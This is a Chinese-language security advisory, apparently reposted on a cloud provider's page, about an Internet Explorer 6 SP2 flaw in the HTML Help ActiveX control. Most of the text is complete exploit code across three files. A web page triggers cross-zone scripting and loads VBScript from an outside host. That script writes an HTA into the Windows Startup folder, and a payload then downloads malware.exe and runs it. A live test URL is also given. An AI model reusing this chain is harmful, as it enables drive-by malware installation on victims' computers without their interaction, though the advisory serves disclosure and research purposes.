Microsoft Internet Explorer 6.0SP2
- Microsoft Windows XP Professional SP2
- Microsoft Windows XP Home SP2
描述:
Microsoft Internet Explorer結合多種漏洞如Help ActiveX控制項等問題,遠程攻擊者可以利用這個漏洞無需使用者互動來執行任意檔案而導致惡意代碼執行。
攻擊者可以按照如下方法實現:
1. 建立一個包含如下代碼的WEB頁:
sp2rc.htm
---------------------------------------------------------------------
<OBJECT id="localpage" type="application/x-oleobject" \
classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" height=7% \
style="position:absolute;top:140;left:72;z-index:100;" \
codebase="hhctrl.ocx#Version=5,2,3790,1194" width="7%"> <PARAM name="Command" \
value="Related Topics, MENU"> <PARAM name="Button" value="Text:Just a button">
<PARAM name="Window" value="$global_blank">
<PARAM name="Item1" value="command;file://C:\WINDOWS\PCHealth\HelpCtr\System\blurbs\to \
ols.htm"> </OBJECT>
<OBJECT id="inject" type="application/x-oleobject" \
classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" height=7% \
style="position:absolute;top:140;left:72;z-index:100;" \
codebase="hhctrl.ocx#Version=5,2,3790,1194" width="7%"> <PARAM name="Command" \
value="Related Topics, MENU"> <PARAM name="Button" value="Text:Just a button">
<PARAM name="Window" value="$global_blank">
<PARAM name="Item1" value='command;javascript:execScript("document.write(\"<script \
language=\\\"vbscript\\\" \
src=\\\"http://freehost07.websamba.com/greyhats/writehta.txt\\\"\"+String.fromCharCode \
(62)+\"</scr\"+\"ipt\"+String.fromCharCode(62))")'> </OBJECT>
<script>
localpage.HHClick();
setTimeout("inject.HHClick()",100);
</script>
---------------------------------------------------------------------
第一個對象(id: localpage)告訴hhctrl.ocx開啟一個協助快顯視窗到C:\WINDOWS\PCHealth\HelpCtr\System\blurbs\tools.htm位置,選擇這個檔案是因為它以本地區處理。在部分電腦上在彈出前會顯示錯誤,這是使用者唯一的機會防止此漏洞工作。
第二個對象(id: inject)告訴協助快顯視窗操縱javascript協議,執行跨站指令碼,指令碼標籤使用遠程檔案寫此頁,並且writehta.txt在不安全本地區中執行。
在這個指令碼中,HHClick是用於自動化此漏洞。
2. Writehta.txt使用adodb recordset寫Microsoft Office.hta 到使用者開機檔案夾中:
writehta.txt
---------------------------------------------------------------------
Dim Conn, rs
Set Conn = CreateObject("ADODB.Connection")
Conn.Open "Driver={Microsoft Text Driver (*.txt; *.csv)};" & _
"Dbq=http://www.malware.com;" & _
"Extensions=asc,csv,tab,txt;" & _
"Persist Security Info=False"
Dim sql
sql = "SELECT * from foobar.txt"
set rs = conn.execute(sql)
set rs =CreateObject("ADODB.recordset")
rs.Open "SELECT * from foobar.txt", conn
rs.Save "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Microsoft \
Office.hta", adPersistXML rs.close
conn.close
window.close
---------------------------------------------------------------------
3. f00bar.txt是由adodb recordset請求檔案,由於沒有對hta檔案做絕對限制,因此可通過請求和儲存檔案到使用者系統上來入侵目標使用者:
f00bar.txt
---------------------------------------------------------------------
"meaning less shit i had to put here"
"<script language=vbscript> crap = """
""": on error resume next: crap = """
""" : set o = CreateObject(""msxml2.XMLHTTP"") : crap="""
""" : o.open ""GET"",""http://freehost07.websamba.com/greyhats/malware.exe"",False : \
crap=""" """ : o.send : crap="""
""" : set s = createobject(""adodb.stream"") : crap="""
""" : s.type=1 : crap="""
""" : s.open : crap="""
""" : s.write o.responseBody : crap="""
""" : s.savetofile ""C:\malware.exe"",2 : crap="""
""" : Set ws = CreateObject(""WScript.Shell"") : crap="""
""" : ws.Run ""C:\malware.exe"", 3, FALSE : crap="""
"""</script> crap="""
---------------------------------------------------------------------
測試方法:
警 告
以下程式(方法)可能帶有攻擊性,僅供安全研究與教學之用。使用者風險自負!
Paul (paul@greyhats.cjb.net)提供測試頁面如下:
http://freehost07.websamba.com/greyhats/sp2rc.htm
建議:
Microsoft
---------
目前廠商還沒有提供補丁或者升級程式,我們建議使用此軟體的使用者隨時關注廠商的首頁以擷取最新版本:
http://www.microsoft.com/windows/ie/default.asp
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
